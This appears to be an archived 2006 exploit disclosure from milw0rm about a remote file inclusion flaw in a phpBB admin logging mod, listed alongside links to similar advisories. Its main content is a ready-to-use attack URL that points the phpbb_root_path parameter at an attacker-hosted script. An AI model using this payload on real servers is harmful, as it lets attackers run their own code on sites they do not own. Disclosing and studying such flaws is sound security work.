Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA22137] BBaCE "phpbb_root_path " File Inclusion

[SA22261] Drupal IMCE Module Multiple Vulnerabilities

[SA22242] HAMweather "do_parse_code" Command Injection Vulnerability

[SA22238] OpenBiblio Local File Inclusion and SQL Injection

From:	MILW0RM <submit_(at)_milw0rm.com>
Date:	05.10.2006
Subject:	phpBB Admin Topic Action Logging Mod <= 0.94b File Include Vuln

          /      \
       \  \  ,,  /  /
        '-.`\()/`.-'
       .--_'(  )'_--.
      / /` /`""`\ `\ \           * SpiderZ Hacking Security *
       |  |  ><  |  |
       \  \      /  /
           '.__.'


# Author: SpiderZ
# Admin Topic Action Logging Remote File Inclusion Vulnerability
# Version 0.95 Admin Topic Action Logging
# For: phpBB ( 2.0.x - 2.0.21 )
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
_________________________________________________________________________




http://site.com/[path]/admin/admin_topic_action_logging.
php?setmodules=pagestart&phpbb_root_path=http://[Evil_script]




---------------------------------------------------------------------------------
----
# Download: http://www.nivisec.com/downloads/phpbb/admin_topic_action_logging_beta.zip
# File: 38 KB
---------------------------------------------------------------------------------
----

# milw0rm.com [2006-10-04]